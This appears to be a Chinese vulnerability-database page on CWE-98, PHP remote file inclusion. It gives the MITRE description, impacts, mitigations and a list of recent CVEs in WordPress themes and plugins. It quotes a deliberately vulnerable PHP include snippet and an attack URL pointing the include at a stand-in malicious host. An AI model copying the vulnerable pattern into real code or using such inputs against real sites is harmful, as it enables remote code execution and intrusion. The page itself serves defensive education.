目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类漏洞列表 1258

CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类弱点 1258 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-98是PHP远程文件包含漏洞,源于程序未严格限制包含语句中的文件名输入。攻击者常通过构造恶意URL,诱导服务器加载并执行远程恶意代码,从而获取系统控制权。开发者应避免直接使用用户输入作为包含路径,需实施严格的白名单校验,禁用远程文件包含功能,并确保输入经过充分净化,以阻断此类攻击路径。

MITRE CWE 官方描述
CWE:CWE-98 PHP程序中包含/要求语句的文件名控制不当('PHP远程文件包含') 英文:PHP应用程序从上游组件接收输入,但在将其用于“require”、“include”或类似函数之前,未对输入进行限制或限制不正确。 在某些版本的PHP及其配置中,这允许攻击者指定一个指向远程位置的URL,产品将从该位置获取要执行的代码。在其他与路径遍历相关的情况下,攻击者可以指定一个可能包含可由PHP解析的可执行语句的本地文件。
常见影响 (1)
Integrity, Confidentiality, Availability Execute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the f…
缓解措施 (5)
Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and Design When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and Design For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, Operation Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, Operation Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
代码示例 (1)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
CVE ID 标题 CVSS 风险等级 Published
CVE-2026-87927 MaxSite CMS 109.6 本地文件包含漏洞 — MaxSite CMS 8.2 High 2026-09-09
CVE-2026-15667 Eventin 4.1.22 认证本地文件包含漏洞 — Eventin – Event Calendar, Tickets, Registration, Booking & WooCommerce 7.5 High 2026-09-09
CVE-2026-15406 Eventin 4.1.22 认证后本地文件包含漏洞 — Eventin – Event Calendar, Tickets, Registration, Booking & WooCommerce 7.5 High 2026-09-09
CVE-2026-11613 Divi Engine Divi Ajax Filter 代码注入漏洞 — Divi Ajax Filter 9.8 Critical 2026-09-04
CVE-2026-78478 Elated-Themes Mane 代码注入漏洞 — Mane 8.1 High 2026-08-25
CVE-2026-14280 WordPress Events Manager 代码注入漏洞 — Events Manager – Calendar, Bookings, Tickets, and more! 6.6 Medium 2026-08-25
CVE-2026-32560 LiquidThemes MagicAI for WordPress 代码注入漏洞 — MagicAI for WordPress - AI Text, Image, Chat, Code, and Voice Generator 8.8 High 2026-08-24
CVE-2026-66670 WordPress Måne 代码注入漏洞 — Måne 8.1 High 2026-08-24
CVE-2026-66587 WordPress WPCafe Pro 代码注入漏洞 — WP Cafe Pro 9.8 Critical 2026-08-24
CVE-2026-28152 select-themes Tonda 代码注入漏洞 — Tonda Core 8.1 High 2026-08-24
CVE-2026-28151 select-themes Tonda 代码注入漏洞 — Tonda 8.1 High 2026-08-24
CVE-2026-66671 WordPress Verdure Core 代码注入漏洞 — Verdure Core 8.1 High 2026-08-24
CVE-2026-66586 WordPress WPCafe 代码注入漏洞 — WP Cafe Pro 6.6 Medium 2026-08-20
CVE-2026-28150 uxper Golo Framework 代码注入漏洞 — Golo Framework 8.1 High 2026-08-20
CVE-2025-15637 Edge Themes Shuffle 代码注入漏洞 — Shuffle 8.1 High 2026-08-20
CVE-2026-75963 WordPress Events Made Easy 代码注入漏洞 — Events Made Easy 7.5 High 2026-08-20
CVE-2026-73387 WordPress Resido 代码注入漏洞 — Resido 8.1 High 2026-08-19
CVE-2026-73400 Jetmonsters Restaurant Menu by MotoPress 代码注入漏洞 — Restaurant Menu by MotoPress 8.1 High 2026-08-18
CVE-2026-32464 WordPress Theme Test Drive 代码注入漏洞 — Theme Test Drive 8.1 High 2026-08-18
CVE-2026-28570 Spab Rice Vavo 代码注入漏洞 — Vavo Core 8.1 High 2026-08-18
CVE-2026-66657 Mikado-Themes Biagiotti Core 代码注入漏洞 — Biagiotti Core 8.1 High 2026-08-13
CVE-2026-66656 Mikado-Themes Foton Core 代码注入漏洞 — Foton Core 8.1 High 2026-08-13
CVE-2026-66653 WordPress Barista Coffee Shop 代码注入漏洞 — Barista 8.1 High 2026-08-13
CVE-2026-66450 WordPress Geo Mashup 代码注入漏洞 — Geo Mashup 8.1 High 2026-08-13
CVE-2026-66710 WordPress E2Pdf 代码注入漏洞 — e2pdf 8.1 High 2026-08-06
CVE-2026-17605 stiofansisland Payment forms, Buy now buttons, and Invoicing System | GetPaid 代码注入漏洞 — Payment forms, Buy now buttons, and Invoicing System | GetPaid 6.6 Medium 2026-08-01
CVE-2026-63302 OpenSolution Quick.CMS 代码注入漏洞 — Quick.CMS 5.1 Medium 2026-07-28
CVE-2026-65481 Elated-Themes Vino 代码注入漏洞 — Vino 7.5 High 2026-07-23
CVE-2026-65477 select-themes Tonda Core 代码注入漏洞 — Tonda Core 7.5 High 2026-07-23
CVE-2026-57805 select-themes Tonda 代码注入漏洞 — Tonda 7.5 High 2026-07-13

CWE-98(PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) 是常见的弱点类别,本平台收录该类弱点关联的 1258 条 CVE 漏洞。